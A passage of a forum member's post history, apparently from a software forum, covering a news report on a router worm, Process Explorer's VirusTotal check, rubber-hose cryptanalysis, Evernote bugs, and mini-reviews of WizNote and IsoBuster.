With 9TB of data, survey is one of the most exhaustive—and illicit—ever done.
Ullrich takes this to mean that the worm downloads a second-stage exploit from port 193 of the attacking router. (The port can change, but it is always less than 1024.)

The objective behind this ongoing attack remains unclear. Given that the only observable behavior is to temporarily infect a highly select range of devices, one possible motivation is to test how viable a self-replicating worm can be in targeting routers. Indeed, last March, an anonymous hacker claimed to have built a botnet for more than 420,000 routers, modems, and other Internet-connected devices purely for the fun and knowledge it provided.

As was the case in that unconfirmed campaign, the behavior Ullrich has observed is rare, and it will be worth following Sans as it digs further into this attack. Ullrich has more details here and here.

Article updated throughout to add newly available information.

115
After reading the post (below) in 404 Tech Support, I downloaded and ran the latest version of Sysinternals' Process Explorer.
It's very nifty.
You just right-click on a process in the PE window and PE sends the hash of that process' file to VirusTotal.
A new column "VirusTotal" in the PE window says "Hash submitted...", and after VT returns its score for files of that hash, it displays the score - e.g., "0/50", meaning in this case that no virus checker of the 50 that tested this file found any virus/malware.
The VT score stays in the column whilst that process continues to run.
If you close and restart PE, the VT column for that same process is empty - which makes sense, because the score was for that process run at that previous point in time, and the process file could have been changed (would have a new hash) between starts.

The post has an image, some links and a YouTube demo of the thing described.
(Copied below sans embedded hyperlinks/images.)
Process Explorer now includes VirusTotal integration | 404 Tech Support
By Jason Hamilton on February 5, 2014 in Software

Last week, version 16 of Process Explorer was released and 16.01 was released yesterday. Its newest feature is VirusTotal integration. You use Process Explorer to examine the processes currently running on a Windows computer and now you can right-click on any process to upload it to VirusTotal to have it scanned by 40+ different antivirus scanners. You will then get the feedback on how many of those AV engines thought the file could be malicious. All from within Process Explorer.

The new version includes a new column for VirusTotal and a new entry on the context menu when you right-click on a process.

process explorer Process Explorer now includes VirusTotal integration

The first time you use the ‘Check VirusTotal’ function, you will be shown the Terms in your browser and a pop-up asking if you agree with the terms. After that, the process is hashed and submitted to VirusTotal. The column is then updated with the results to tell you how many of the virus scanners find the file to be malicious.

I made a quick screencast to demonstrate the new functionality.

Process Explorer could already be handy in cleaning a malware infection but this new feature makes it even better.

116
Living Room / New form of cryptanalysis - "Rubber Hose"
« on: January 11, 2014, 01:46 AM »
Rubber-hose cryptanalysis - Wikipedia, the free encyclopedia
For the encrypted filesystem, see Rubberhose.

In cryptography, rubber-hose cryptanalysis is the extraction of cryptographic secrets (e.g. the password to an encrypted file) from a person by coercion or torture[1][2]—such as beating that person with a rubber hose, thus the name—in contrast to a mathematical or technical cryptanalytic attack.

According to Amnesty International and the UN, many countries in the world routinely torture people.[3][4][5][6] It is therefore logical to assume that at least some of those countries use (or would be willing to use) some form of rubber-hose cryptanalysis.[1] In practice, psychological coercion can prove as effective as physical torture. Not physically violent but highly intimidating methods include such tactics as the threat of harsh legal penalties. The incentive to cooperate may be some form of plea bargain, such as an offer to drop or reduce criminal charges against a suspect in return for full co-operation with investigators. Alternatively, in some countries threats may be made to prosecute as co-conspirators (or inflict violence on) close relatives (e.g. spouse, children, or parents) of the person being questioned unless they co-operate.[4][7]

In some contexts, rubber-hose cryptanalysis may not be a viable attack because of a need to decrypt data covertly; information such as passwords may lose its value if it is known to have been compromised. It has been argued that one of the purposes of strong cryptography is to force adversaries to resort to less covert attacks.[8]

The earliest known use of the term was on the sci.crypt newsgroup, in a message posted 16 October 1990 by Marcus J. Ranum, alluding to corporal punishment:

    ...the rubber-hose technique of cryptanalysis. (in which a rubber hose is applied forcefully and frequently to the soles of the feet until the key to the cryptosystem is discovered, a process that can take a surprisingly short time and is quite computationally inexpensive).
    —[9]

Although the term is used tongue-in-cheek, its implications are serious: in modern cryptosystems, the weakest link is often the human user.[10] A direct attack on a cipher algorithm, or the cryptographic protocols used, is likely to be much more expensive and difficult than targeting people who use or manage the system. Thus, many cryptosystems and security systems are designed with special emphasis on keeping human vulnerability to a minimum. For example, in public-key cryptography, the defender may hold the key to encrypt the message, but not the decryption key needed to decipher it. The problem here is that the defender may be unable to convince the attacker to stop coercion. In plausibly deniable encryption, a second key is created which unlocks a second convincing but relatively harmless message (for example, apparently personal writings expressing "deviant" thoughts or desires of some type that are lawful but taboo), so the defender can prove to have handed over the keys whilst the attacker remains unaware of the primary hidden message. In this case, the designer's expectation is that the attacker will not realize this, and forego threats or actual torture.

In some jurisdictions, statutes assume the opposite—that human operators know (or have access to) such things as session keys, an assumption which parallels that made by rubber-hose practitioners. An example is the United Kingdom's Regulation of Investigatory Powers Act,[11][12] which makes it a crime to not surrender encryption keys on demand from a government official authorized by the act.

According to the Home Office, the burden of proof that an accused person is in possession of a key rests on the prosecution; moreover, the act contains a defence for operators who have lost or forgotten a key, and they are not liable if they are judged to have done what they can to recover a key.[11][12]

117
Living Room / Evernote, the bug-ridden elephant.
« on: January 04, 2014, 01:20 AM »
I haven't used Evernote in ages, preferring the security and controllability of a decent PIM client (currently using OneNote and InfoSelect, so I have a Client + Cloud duplication), but I was surprised to read this on jasonkincaid.net (he's an Evernote addict). Caveat emptor, it seems:
(Copied below sans embedded hyperlinks/images.)
Evernote, the bug-ridden elephant
Posted on January 3, 2014 by Jason Kincaid

To say this post pains me would be an understatement. More than any other technology, Evernote is part of me, having evolved from habit to instinct over several years and nearly seven thousand notes. Every day ideas flit through my head, ideas for essays, for characters, for jokes. Just now I catch a glimpse of one, without thinking I am talking into my phone like a Star Trek Communicator, telling myself that maybe I should title this post Leaky Sync. Maybe not.

Because I use it so often, I am unusually familiar with the service’s warts. Evernote’s applications are glitchy to the extreme; they often feel as if they’re held together by the engineering equivalent of duct tape. Browser extensions crash, text cursors leap haphazardly across the screen — my copy of Evernote’s image editor Skitch silently failed to sync for months because I hadn’t updated to the new version. Most issues are benign enough, but the apps are so laden with quirks that I’ve long held a deep-seated fear that perhaps some of my data has not been saved, that through a syncing error, an accidental overwrite — some of these ideas have been forgotten.

As of last month, I am all but sure of it.

I’ve been learning how to write songs. It’s terrifying because I stink, so I trick myself, diddling around without actually intending to record anything. With any luck I reach a fugue state, vaguely listening for my fingers to do something interesting; sometimes instinct steers me toward the green elephant’s ‘record’ button and I play for a while.

And so I find myself on December 5, when a meandering session results in an 18 minute Evernote audio recording on my iPhone labeled “not bad halfway through” — high praise, for me. Some of the chord changes are sheer luck, no idea what I did but they sounded good the first time.

I decide to give it another listen with more discerning ears, self-loathing eagerly waiting in the wings.

And — nothing. Zero seconds out of zero seconds. It’s a blank file.

Alarmed, I tap record again, make another note. It won’t play, either.

Another. This one works.

One more. Zero out of zero.

I check the Wifi signal (fine). I let the phone sit for a while to sync, just in case. I head to the web app, which — thankfully — shows the note intact, with its attachment as an 8.7 megabyte .m4a file.

I try to open it in iTunes — it shrugs. Quicktime spits an error. Time to bust out the big guns. VLC.

Nada.

Teeth grinding, I contact Evernote support. The process is slow and bumbling, but I’d like to think this has more to do with Evernote’s overly-structured ticket system than the people working there. Unfortunately, in the process of trying to learn what happened to my audio file, I discover another flaw in Evernote’s system.

As an apparently standard part of Evernote’s support process, it requests that users send over an Activity Log. This is a file generated by each Evernote application that records the myriad housekeeping events going on behind the scenes — ”Sending preference changes…”, and so on.

For most services this log wouldn’t make me bat an eye, but in many ways my Evernote archive is more sensitive than my Gmail account. With email, there’s always the possibility that the guy on the other end will forward the message along, so I tend to behave accordingly. With Evernote it’s just me. I try not to filter myself because that’s how creativity dies.

I ask the support person to verify that he will not have access to my data. No, he assures me. Just the meta data, like note titles (why Evernote doesn’t believe note titles are potentially sensitive is beyond me, but, in my case, they’re usually blank anyway).

Still, out of habitual paranoia, I skim through the log before sending. Thousands of lines of gibberish, dates and upload counts and [ENSyncEngine] INFO: Sending search changes.

And then I come across something more legible. It’s a text note I left a few evenings ago, a stray thought about sex, if I’m being honest. Further down, another note, the entire contents of the text, broken up by some HTML tags. And another.

Turns out there’s a bug, this time compliments of Evernote for Mac’s ‘helper’ — an official mini app that’s meant for jotting down notes without having to switch to the hulking beast that is the desktop application. On my Macbook Pro, running the latest version of Evernote for Mac, this ‘helper’ app records the entirety of any text it saves into the log file.

Alarmed and not a little bit furious that I nearly sent him some deeply embarrassing musings, I tell the support person about the issue, noting that it is a serious breach of privacy (and an obvious one, given that I noticed it in all of ten seconds).

They say to file another ticket.

As for the audio file: even more bad news.

It’s been nearly a month and the most substantive thing Evernote has said is that it is “seeing multiple users who have created audio notes of all sizes where they will not play on any platform.” The company has given me no information on what’s wrong with the corrupted file, and no indication that they might find a way to get it working in the future.

Adding further insult, the up-to-date iOS application continues to create corrupted audio notes, despite receiving an update on December 17, twelve days after I reported the issue. The support team actually couldn’t tell me whether that update addressed the audio problem — they said I should check the App Store release notes, which routinely includes the ambiguous line “bug fixes”, so I had to figure it out for myself. Two more corrupted notes later, I can say with some authority that it’s still there (I’ve also encountered a new issue, where some audio files simply vanish).

Through it all, the support team has displayed a marked lack of urgency that has bordered on nonchalance. Maybe they’re trained that way, or maybe data loss on Evernote isn’t as rare as I’d hope.

None of this has been life shattering, but given how reliant I am on Evernote it is deeply unnerving — now each note I instinctively leave myself is tinged with anxiety. I’m concerned that as I dig through my Evernote archive I’ll encounter more corrupted audio notes, and, worse, my paranoia is increasingly convinced that there may have been notes that never were saved to the archive at all.

More than that, I am alarmed that Evernote seems to be playing fast and loose with the data entrusted to it. Instead of building a product that is secure, reliable, and fast, it has spread itself too thin, trying to build out its install base across as many platforms as possible in an attempt to fend off its inevitable competition.

This strategy is tolerable for a social network or messaging app (Facebook got away with atrociously buggy apps for years). But Evernote is literally aiming to be an extension of your brain, the place to store your most important ideas. Its slogan is “Remember Everything”. Presumably the integrity of its data should be of the utmost importance.

What’s worse, it isn’t consistently improving. When iOS7 launched, Evernote was one of the first applications to overhaul with a new, ‘flat’ design, and as a result benefitted from being featured prominently within the App Store. But functionally, it was clearly a downgrade from the old app, with extra dollops of sluggishness, crashes, and glitches — it may well have introduced the audio recording bug I fell prey to (I believe it dates back to at least October, when I encountered a similar audio issue that I chalked up to user error).

Evernote’s security track record has been similarly frustrating. Asked in October 2012 why the service had not implemented the increasingly-common two-factor authentication option already offered by companies like Google, Evernote’s CEO, Phil Libin, wrote “Finding an approach that gives you increased security without making Evernote harder to use is not just a matter of adding two-factor authentication…”, implying that something better was on the way.

Five months later the promised security upgrade was still MIA — until Evernote was hacked, its database of user passwords was compromised, and the service rushed to implement a two-factor system that didn’t look much different from the sort Libin was apparently aiming to leapfrog.

This is a company with over $250 million in funding and 80 million users. And unlike many web services that promise exhaustive security and reliability, it’s one I actually pay for.

Ironically, the same day I was told Evernote didn’t have a fix for my corrupted music recording, the New York Times published an article about Evernote titled, An App That Will Never Forget a File.

118
Originally posted:2013-12-31
Last updated2013-12-31

Basic Info
App/Service NameWizNote - 00 logo.png  WizNote
Thumbs-Up Rating :Thmbsup: :Thmbsup: :Thmbsup: :Thmbsup: (still testing)
App URLhttp://www.wiz.cn/index.html
(Browse using Google Chrome, to auto-translate.)
App Version Reviewedv4.1 (2013-12-26)
Test System SpecsMS Win7-64 Home Premium
Supported OSesPC Windows (various)
Support MethodsSupport at main website. (Browse using Google Chrome, to auto-translate.)
Upgrade PolicyFree upgrades.
Trial Version Available?N/A (free)
Pricing SchemeFREE including basic Cloud service, but 100 yuan pa or 10 yuan pm for full cloud service.

Intro and Overview:
This Mini-Review follows on from a discussion thread:
Note: Browse the Chinese website/links using Google Chrome, to auto-translate.
...I've found a killer notetaker: wiznote. Chinesse-only website, but chrome does a decent work translating it. ...
________________________

After reading @urlwolf's post, I took a look at WizNote.
This is just a heads-up re WizNote:
I could not find this referenced otherwise in the DC forum,  or the OutlinerSoftware forum, or their EditGrid list of Outliners.
So I posted details to them both, and here's the post to the DC forum.
It might be going under a different name elsewhere, but I do not know.
WizNote is new to me anyway, and because @urlwolf said it was a killer notetaking app, I tried it out. He was not far wrong. It seems to be very good.

Features include: (not an exhaustive list by any means)
  • a FREE version (there’s a limit on Cloud storage and Cloud function, I think, though am not sure what).
  • a VIP version which has a monthly bill of 600 10 yuan or something.
  • a simple-and-easy-to-use desktop application (this is mandatory to use the system and to set up your database and Cloud account).
  • a web-based application (so you and selected collaborators can access it from a web browser).
  • AES encryption for specified folders/notes.
  • a mobile application (*app*) - (I think, but I have not looked at this aspect, yet).
  • 3-pane Outliner format.
  • internal/external hyperlinking.
  • hierarchical Tags.
  • Standard word searches and SQL searches.
  • saved searches (so you can use the searches as a view across segments of your database).
  • an email address (to receive email, but not sure whether it can send any directly).
  • plugins including web-clipping tools - “send-toWizNote” - add-ons for Firefox, Chrome and IE (and other browsers).
  • capture of selected parts or entire web pages (as HTML, with all rich text and images separately editable in the Outlines.
  • in the desktop version, images can be edited instantly via seamless integration with MS Paint, and saved back seamlessly into the Outliner, replacing the image you started with.
  • smooth and fast auto-syncing to the Cloud (you have to open up a FREE account to use this), and easy access by collaborators.
  • collaborators can be set up as “groups” and can be sent emailed notices of certain events (I don’t understand what exactly, as the emails are in Chinese).
  • built-in Import/Export (e.g., even to output CHM help file formats). Some of this seems ro be via plugins, of which there look to me many. I tried a plugin for importing a OneNote notebook, but it was for OneNote 2007 or 2010, not my version 2013, I think. It partially worked, and rather well, at that.
  • quite a few more very nifty features, too many to list here and several I have not fully explored yet.

It feels like a cross between InfoSelect v8 and MS OneNote 2013, and has some surprisingly intuitive responses. Quite nice to use.
There are some pros and cons, but this is NOT an evaluation report - I am still exploring/discovering the app.
The biggest difficulty I have found so far was ploughing my way through Google Translate versions of the Chinese websites I had to visit for the main application and its plugins.

Collected links to download as at 2013-05-18: (so you don’t have to spend the time I did in finding the latest/current versions).

If anyone was interested, I could set up my trial WizNote Cloud database for others to access - it is mostly full of English translations of the Chinese documentation about WizNote, so we could collaborate on that and experiment with it as we learn together.
________________________

FWIW, I think it's a killer app.
A pity the forums, and the rest of the site, is not in EN.
There seem to be many plugins.
I could run the android app on my 2.3 phone, but on my 4.2 tablet it doesn't seem to even be listed on the app store.
How this flew under the radar, I have no idea. It does many things right.

Yes, It's quite an amazingly good package.
By the way:
  • There is an informative "Wiz Knowledge" (Windows mobile app) documentation link - see here.
  • The details of the VIP account pricing/costs are in a blog - see here.
    It says about costs:
    (Copied below sans embedded hyperlinks/images.)
    VIP restore the original price notification
    Posted on May 6, 2013 by admin
    Dear know:
    Hello! To know the notes VIP service will be held on May 9, 2013, formally restored to the original (100 yuan / year, 10 yuan / month), 40% discount promotion is no longer carried out. May 9, you can still enjoy a 40% discount on purchase of VIP services, known to the new and old customers! Thank you for your continued support!
    VIP service purchase Address: http://item.taobao.c...m.htm?id=24859296691
    Meanwhile, in May, we will carry out more promotions to give back to the new and old customers, so stay tuned official microblogging @ know notes Events!
    From known notes (Wiz)


Here is the opening/startup UI page:

WizNote - 03 auto-hide toolbar deop-down.png


Checking for updated version:

WizNote - 01 Main opening (start) page.png


WizNote toolbar: (can be floating or fixed drop-down)

WizNote - 02 Update check + install.png


Who this software is designed for:
Any PC user who requires a modern, flexible Cloud-based and Client-based PIM, designed for group collaboration (if you want it), and thus with built-in group collaboration tools included.
So far, the only real alternative would seem to be OneNote + SkyDrive (though I am unsure of the group collaboration tools), with Evernote not quite getting there as the Client component is deliberately crippled (not as fully-functional as the Cloud component) and thus is not a Client-based equivalent alternative.

Interestingly, WizNote includes the functionality (as plugins) to import from OneNote and Evernote.

The Good:
Relatively simple to use, though quite a sophisticated tool. Need to read the documentation to fully utilise the tool properly.
It does many things right:
  • Security. Notes encrypted locally before sending it to server-
  • Multiplatform
  • Very flexible interface (2/3 columns)
  • Plugins
  • Android app that beats even onenote
  • Tables
  • good paste from web, with url included next to the paste (like onenote)
  • Can publish to blog straight (!)
  • Very clean Html. Beats word, gdocs. No inline css.
  • Word count. Press 'i' icon, then details
  • Tagging
  • Very flexible tree, you can disable showing notes in subfolders (Apple-styple only one level deep)
  • Export is not an afterthought.
  • Live search, highlights matches, shows small window of context (like rightnote, evernote). Beats onenote
  • Web access (www.wiz.cn), in chinesse :)
  • Autolink urls
  • Beats any local wiki, no silly formatting, all wysiwyg
  • Can add a note without opening main app (like cintanotes)
  • Saves version history, for free (only in paid evernote)
  • Can set paragraph line height (1.5x improves readability)
  • Multi-search match highlights
________________________

Needs Improvement:
And many things wrong:
  • No autocapitalization of sentences
  • Fonts kind of suck; no cleartype, no smoothing whatsoever. As horrible as office 2013.
  • Have to get out of edit mode to search
  • Changing from one note to another is slow (subsecond, but slow)
  • Not easy to move with kb on the right side tree
  • No spellcheck
________________________

Why I think you should use this product/service:
If you are a PC user who requires a modern, flexible Cloud-based and Client-based PIM, designed for group collaboration (if you want it), and thus with built-in group collaboration tools included, then this could be the tool for you.
For example, urlwolf says "It is a killer app.".

How it compares to similar products:
There do not seem to be any/many similar tools.

From the Intro and Overview, above:
So far, the only real alternative would seem to be OneNote + SkyDrive (though I am unsure of the group collaboration tools), with Evernote not quite getting there as the Client component is deliberately crippled (not as fully-functional as the Cloud component) and thus is not a Client-based equivalent alternative.
______________________

Conclusions:
A flexible and impressively useful PIM - one which seems to be being rapidly developed/updated/improved over the course of the last 12 months.
The ability to categorise things (using Tags) is excellent, but would be better if it could also be automated with "smart tagging" - i.e., tags automatically made depending on rules (conditions-actions) set by the user.
Interesting point: WizNote software is one of several distinct pieces of software from the same developer,  but whereas each of the other pieces has a discrete functionality, WizNote seems to incorporate parts of many of the others - i.e., is designed with overlapping functionality.

119
Could anyone advise please?
I want to automate a ping back for blocked incoming pings - could I use BlackIce Defender for that? Or something else?
I want to find out more about who is pinging me and where from, rather than just passively block them in my firewall or the NAT.
I still have the BlackIce Defender install in my software archive backup. Not sure if it would run on Win7-64 Home Premium.

120
Thought these links might be of historic interest to computer buffs:
The CDC 6600 Architecture
Index of /CDC directory: http://ygdes.com/CDC/

I'd been looking all over for something like this a while back, and came up with nothing. Just happened to see it linked to in the Hacker News feed today.

This link to a PLATO online archive/emulation site might be of interest too: http://www.cyber1.org/
You can request a signon. The entire published catalog of courseware is there.

This page from 2010 is 404 now:
PLATO at 50
Jun 2 2010

This week, the Computer History Museum (CHM) in Mountain View, California will welcome a select group of Illinois alumni as it celebrates the 50th Anniversary of PLATO, a large-scale computer system for which numerous popular technologies were invented, including gas-plasma flat-panel displays and interactive touch screens, as well as many software innovations.

A co-production of the PLATO History Foundation (PHF) and CHM, the event will assemble in one place many of the key people involved with the creation of PLATO, for the first-ever public conference celebrating its history and accomplishments.

PLATO's list of innovations and seminal influences is considerable. Stemming from the University of Illinois in the 1960s and later marketed by Control Data Corporation, PLATO stands for "Programmed Logic for Automated Teaching Operations." Designed as a large-scale system to teach students nationwide, with more than 10,000 hours of courseware in subjects ranging from elementary math to air traffic control, the federally-funded system quickly became much more -- a virtual microcosm of today's online world, with a thriving online community predating today's social media by decades.

The PLATO@50 conference features a significant lineup of speakers, including U of I alumnus and professor emeritus Donald Bitzer ((BS' 55, MS'56, and PhD 60, Electrical Engineering), creator of PLATO and co-inventor of the flat-panel gas plasma display; and Illinois computer science alumnus Ray Ozzie (1979, Computer Science), Chief Software Architect of Microsoft who worked as a systems programmer on PLATO in the 1970's.
Illinois computer science alumnus Ray Ozzie

"Those of us who were fortunate enough to have been early users of the PLATO system got a sneak peak at what one day the internet would become," said Ozzie. "Don Bitzer believed that computers could have a far broader impact than just simply computing; that in fact they could transform how we learn. But beyond education, the unbounded creativity of its emergent online community caused PLATO's impact to be far broader than any of us could have ever imagined."

"It's one of the great, unsung stories in computing over the last half century, and we're proud to stage this event on site and online,"said John Hollar, president and chief executive officer of the Computer History Museum.

On Wednesday, June 2 at 7:00 p.m., CHM presents "PLATO@50- Seeing the Future Through the Past." The evening program will begin with a PLATO overview presented by Dear. Then John Markoff of The New York Times will moderate a panel featuring Bitzer and Ozzie. Daytime panels on Thursday, June 3 will discuss the culture of innovation fostered by Bitzer, PLATO hardware and software, online education, online multiplayer games, and PLATO's online community. For more information and event descriptions, visit http://computerhisto...listing/plato-at-50/.

About the Computer History Museum
The Computer History Museum is a nonprofit organization with a four-decade history. The Museum is dedicated to the preservation and celebration of computer history, and is home to the largest international collection of computing artifacts in the world, encompassing computer hardware, software, documentation, ephemera, photographs and moving images.

CHM brings computer history to life through an acclaimed speaker series, dynamic website, onsite tours, as well as physical and online exhibits. Current exhibits include, Charles Babbage's Difference Engine No. 2, Mastering the Game: A History of Computer Chess, and Innovation in the Valley -- A Look at Silicon Valley Startups. The online exhibit, featuring the Timeline of Computer History and over 600 key objects from Visible Storage, is found at: www.computerhistory.org.
______________________

Contact: Amy Jackson, Eastwick Communications, 415/609-2435.

121
Mini-Reviews by Members / IsoBuster Pro - Mini-Review
« on: December 12, 2013, 05:51 AM »
Originally posted:2013-12-12
Last updated2015-06-28

Basic Info
App/Service NameisoBuster - 00 start logo.png  IsoBuster PRO
What it doesRescue/recover corrupted/"unreadable" files from CD, DVD, HD DVD or Blu Ray disc.
Recover data from Hard Drive, Floppy, USB, Flash Drive, Media Card, SD, SSD, MMC and more.
Thumbs-Up Rating :Thmbsup: :Thmbsup: :Thmbsup: :Thmbsup: :Thmbsup:
App URLhttp://www.isobuster.com/
App Version ReviewedCurrent version: 3.6 PRO
Test System SpecsMS Win7-64 Home Premium, Win8.1-64 PRO
Supported OSesPC Windows (various)
Support MethodsSupport website: http://www.isobuster.com/support.php
Online HELP: http://www.isobuster.com/help/
Reference linksIsoBuster Testimionals - A CD, DVD, BD, HD DVD, HDD, USB Recovery Tool
IsoBuster Reviews - Recover Data from Hard Drive, CD, DVD, BD, USB, SD, etc.
Upgrade PolicyFree upgrades.
Trial Version Available?Yes.
Pricing SchemePersonal Licence US$ 39.95
Professional Licence US$ 59.95

Intro and Overview:
In the discussion thread: Re: IsoBuster on offer, 2012-11-28: Recover Files From Damaged Media, I wrote:
I read the specs and its range of functionality looked pretty good. I have just bought a licence
I see an IainB mini-review approaching  :)
Very probably.    :)
(Always assuming that it turns out to be worth reviewing.)

That was for IsoBuster v3.1 beta. Since that time, there have been several upgrades to the current version, and I have had the opportunity to use IsoBuster to test/check/recover files on a faulty/failing hard drive, though I have so far not needed to rescue/recover data from corrupted optical discs or from files burned to optical disc but with incomplete session termination (makes the files "unreadable").

From the IsoBuster website:
The Ultimate data recovery software!
Supporting ALL types of media, including CD/DVD, BD/HD DVD, Hard Drives, SSM, USB flash drives, Zip drives, Jaz drives, floppies etc.
  • Rescue lost files from a bad or trashed CD, DVD or a Blu Ray disc.
  • Recover deleted files from a Hard Drive, Memory card or of from flash media that Windows says needs to be formatted!
  • Save important documents, precious pictures or video from the family, your only system backup,...
- IsoBuster can do it all!

One tool, supporting all formats, for only one very democratic price.

No accumulated cost if you need more than one type media or file system supported. IsoBuster is a highly specialized yet easy to use media data recovery tool. It supports all disc formats and all common file systems. Insert a disc, USB stick or memory card, Start up IsoBuster and select the drive or media (if not selected already) and let IsoBuster mount the media. IsoBuster immediately shows you all the partitions or tracks and sessions located on the media, combined with all file systems that are present. This way you get easy access, just like explorer, to all the files and folders per file system. Instead of being limited to one file system that the OS picks for you, you have access to "the complete picture". Access data from older sessions or hidden partitions, access data that your OS (e.g. Windows) does not see or hides from you etc.
_____________________________

Note: Installation of current versions no longer has Candyware (Toolbar).

The About window: (image to be updated)

IsoBuster - 02 about v3.1beta.png


The Main GUI window: (image to be updated)

IsoBuster - 03 main window on startup.png


The drive selector pop-down menu: (image to be updated)

IsoBuster - 04 drive selector.png


View of Readyboost drive: (image to be updated)

IsoBuster - 05 view of ReadyBoost drive.png


Who this software is designed for:
Any PC user who requires a flexible multimedia data recovery/backup tool.

The Good:
IsoBuster is relatively simple to use, though it is nonetheless quite a sophisticated tool.
There is an impressive range of features: (from http://www.isobuster.com/isobuster.php)
(Copied below sans embedded hyperlinks.)
Spoiler
Code: Text [Select]
  1. IsoBuster full feature list:
  2.     Data recovery from all possible CD, DVD and Blu Ray (BD & HD DVD) formats:
  3.     CD-i, VCD, SVCD, SACD, CD-ROM, CD-ROM XA, CD-R, CD-RW, CD-MRW, DVD-ROM, DVCD, DVD-RAM, DVD-R, DVD-RW, DVD+R, DVD+RW, DVD+MRW, DVD+R Dual Layer, DVD-R Dual Layer, DVD+RW Dual Layer, DVD+VR, DVD+VRW, DVD-VR, DVD-VRW, DVD-VM, DVD-VFR, BD-ROM, BD-R, BD-R DL, BD-RE, BD-RE DL, BD-R SRM, BD-R RRM, BD-R SRM+POW, BD-R SRM-POW, BDAV, BDMV HD DVD-ROM, HD DVD-R, HD DVD-R DL, HD DVD-RW, HD DVD-RW DL, HD DVD-RAM, HD DVD-Video,... And the list continues.
  4.     Data Recovery from Hard Drives, USB flash / thumb sticks, Memory stick, compact media cards, MMC media cards, SD, Micro SD, Mini SD, xD, GSM, CF, SDHC, SDSC, SDXC, SDIO, mobile phone memory card, memory cards that are used in digital cameras, camcorders, cell phones, MP3 players and any other type media cards, Floppy, Zip and Jaz drives etc.
  5.     All device access, media access, data gathering and interpretation is done exclusively by the software. It does not rely on Windows to provide or interpret the data and so can work completely independent from Windows' limitations.
  6.     Better error handling and several retry-mechanisms to aid you in getting the data anyway.
  7.     The use of both generic and alternative ways to get to the data, get the best out of your CD/DVD-ROM drive.
  8.     The use of primary and secondary file systems to get to the data and/or make use of file system data that might be ignored or 'forgotten' by popular OS. Explore the alternatives.
  9.     CDs stay 'readable' after problems (such as Buffer Under-run,...).
  10.     Read / Extraction from open sessions.
  11.     All sessions, including older ones, are accessible and can be recovered.
  12.     Supports mounting several virtual sessions inside a single DVD+RW or DVD-RW track.
  13.     Read and Extraction of files, CD/DVD images, tracks and sessions from all optical media.
  14.     Scanning for lost UDF files and folders. More on UDF recovery.
  15.     Scanning for lost ISO9660 / Joliet sessions.
  16.     Scanning for files based on their file-signature.
  17.     Scanning for IFO / BUP / VOB file systems on VIDEO and AUDIO DVDs.
  18.     Scanning for lost, deleted and orphaned FAT files and folders.
  19.     Find lost data on CDs, DVDs, BDs or HD DVDs, created with integrated drag and drop applications, otherwise also known as packet writing software. Optimized, but not exclusive, for:
  20.         Roxio Direct CD, Roxio Drag-to-Disc
  21.         Ahead / Nero InCD
  22.         Prassi / Veritas / Sonic DLA
  23.         VOB / Pinnacle Instant-Write
  24.         CeQuadrat Packet CD
  25.         NTI FileCD
  26.         BHA B's CLiP
  27.         Microsoft Windows XP, VISTA, 7, 8
  28.         Sony abCD,...
  29.     Support for Direct CD compressed files. Decompression on the fly.
  30.     Support for Microsoft's Live File system.
  31.     Built in UDF Reader, UDF 1.02 (e.g DVDs), UDF 1.5 (e.g. Packet writing on CD-R, DVDR, CD-RW and DVDRW), UDF 2.01, 2.50, 2.60 (e.g. BD-R SRM+POW),...
  32.     Find lost pictures created and saved to CD or DVD with Sony Mavica, other digital cameras or other devices with embedded UDF write functionality.
  33.     Find lost movies created and saved to CD,DVD, BD or HD DVD with Hitachi, other digital cameras or other devices with embedded UDF write functionality.
  34.     Auto find extensions based on file content to try and give an appropriate name to an orphaned file. This built in file identifier assigns the proper extension to the file so that Windows applications can open the file. Only needed for orphaned files without a name.
  35.     Support for Mount Rainier CD-RW and DVD+RW discs in MRW compatible and non-MRW compatible drives. Auto detection and automatic remapping which can be switched off or forced at all times. Built in MRW remapper / reader. (Built in Method 3 remapper).
  36.     Support for formatted CD-RW discs mounted in very old drives that do not know the CD-RW fixed packet format yet. Auto detection and automatic remapping which can be switched of or forced at all times. Built in Method 2 remapper.
  37.     Built in HFS Reader supporting HFS and HFS+, the Apple Mac file systems.
  38.     Transparent built in support for Mac Resource Fork extensions in the ISO9660 file system.
  39.     Transparent built in support for Mac Resource Fork extensions in the UDF file system.
  40.     Supports multiple Mac Partitions on one medium (e.g. multiple partitions on a CD or in a dmg file).
  41.     Includes a vast range of features for Mac files support on PC (HFS, ISO9660, UDF), including Mac Binary extraction of files.
  42.     Recover data from blanked or quick formatted DVD+RW media.
  43.     Mpg (*.dat) Extraction and dat2mpg 'in one' from SVCD and VCD.
  44.     Ability to create managed image files (*.IBP / *.IBQ).
  45.     Enormous file system coverage and different ways to use them all (find the one suited best for your needs). CDs and DVDs often have different file systems pointing to the same files. This offers possibilities.
  46.     Rock Ridge (e.g. for Commodore users, Server use, etc.).
  47.     HP SimpleSave support.
  48.     Full FAT: FAT12, FAT16, FAT32, ExFAT and FATX support (for instance on DVD-RAM, BD-RE, HDD, Flash media etc.).
  49.     NTFS on all types of media.
  50.     FAT Undelete
  51.     NTFS Undelete
  52.     DOS / Windows Partitions
  53.     EFI / GUID Partitions (GPT)
  54.     HFS / Mac Partitions
  55.     Extended Master Boot Record (EMBR) Partitions
  56.     Finds VIDEO and AUDIO IFO / BUP / VOB file systems independently from other file systems.
  57.     Transparent support for (open) DVD+VR(W) discs, remapping of the content etc. Open +VR discs' files can be seen and extracted right away.
  58.     Show (and allow to extract) the Nero project file if available on the optical disc.
  59.     Support for the CD-i file system and the different behavior from drives trying to mount a CD-i disc.
  60.     Information and file system properties (a must for FS developers).
  61.     CD/DVD/HD DVD/BD Surface scan to see if there are physical read errors.
  62.     Opens checksum files (*.md5) and automatically verifies the image with the checksum file.
  63.     Check if all files and folders are readable without having to extract all data to HD.
  64.     Single sector extraction. Extraction of CD/DVD/BD/HD DVD blocks (e.g. for engineering purposes).
  65.     Sector Viewer. Check a sector's content in IsoBuster's editor and print or save to HD. Engineers and computer savvy people find missing data making use of Sector View.
  66.     Compile (and edit, save, print) lists of all files that contain physical read errors.
  67.     Compile lists of all files, including their Logical block address (ideal to find the logical play order for mp3 CDs).
  68.     CD-Text support from CD and various image files (*.PXI, *.CCD, *.B5T and *.CUE image files).
  69.     Creation of image files (*.ibp and *.ibq,*.iso, *.bin, *.tao.)
  70.     Creation of checksum files (*.md5).
  71.     Creation of cue sheet files (*.cue).
  72.     Conversion of all supported image files to iso/tao/bin/cue/ibp/ibq files.
  73.     Support for Plugins so that various other images files can be opened and/or created.
  74.     Handles opening of multi-file image files.
